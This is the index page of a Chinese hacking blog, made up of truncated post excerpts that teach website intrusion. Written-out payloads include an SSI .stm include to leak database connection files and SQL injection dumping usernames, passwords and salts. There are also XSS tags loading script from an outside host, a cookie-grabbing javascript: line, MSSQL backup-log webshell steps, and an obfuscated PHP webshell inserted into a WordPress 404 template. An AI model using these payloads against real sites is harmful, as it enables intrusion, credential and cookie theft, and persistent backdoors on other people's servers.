小马博客

一个无聊的人,一个无聊的博客

入侵网站时,遇到实在上传不了木马,可以试试上传一个stm文件, 内容为:   <!--#include file="conn.asp"-->   直接访问这个stm文件, 会发现是空白文件,但右键查看源码,你会发现conn.asp就一览无遗, 数据库路径也就到手啦!...

发布 0 条评论

这个漏洞早就出来了,收集在我电脑里找不到了,写到博客上好记点! 1.注册个用户,登录 2.随便找个帖子回复! 回复内容 ↓ 注入语句: a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where...

发布 1 条评论

Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码 影响版本: nginx 0.5.* nginx 0.6.* nginx 0.7 <= 0.7.65 nginx 0.8 <= 0.8.37

发布 0 条评论

1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号 <IMG SRC=javas...

发布 0 条评论

我最常用的就是attrib这个命令,感觉很方便! 一、瞒天过海   这个方法主要是针对一些不想让别人看见的文件,首先修改想隐藏文件的扩展名,将扩展名修改成在系统中没有的类型,比如*.ffh *.jjk 等等,由于这些文件没有跟系统中的任...

发布 0 条评论

天网是大家常用的防火墙软件,有许多人撰文提议安装天网,一时间天网防火墙成了菜鸟、高手必备工具。这样做当然好,至少说明了大家的网络安全意识提高了许多。但万事都有个“度”,超过这个“度”就不好了。现在有许多人对天网的迷信达到...

发布 0 条评论

javascript:alert;window.clipboardData.setData('text',document.cookie); 在IE里输入以上代码,然后直接用ctrl+V,粘贴出来的内容就是你所要抓的cookie了!

发布 0 条评论

字符型: 1、恢复当前库 ;alter database 当前库 set RECOVERY FULL– 2、建表cmd ;create table cmd (a image)– 3、备份当前库到D:\cmd1 ;backup log 当前库 to disk = ‘D:\cmd1′ with init– 4、插入一句话代码到创建的表cmd ;insert ...

发布 0 条评论

有时候一些人对服务器的添加用户的NET和NET1权限做了限制,让很多菜鸟朋友们望而止步。其实个人感觉遇到这个问题都很容易解决的,在此我也共享出我的方法给大家。   cmd命令删除net和net1文件。一般删除之后系统会自动恢复文件,恢复...

发布 0 条评论

进入后台 后台-外观-编辑,找到404的问题插入马,马的代码: <script language=”php”>fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).c...

发布 0 条评论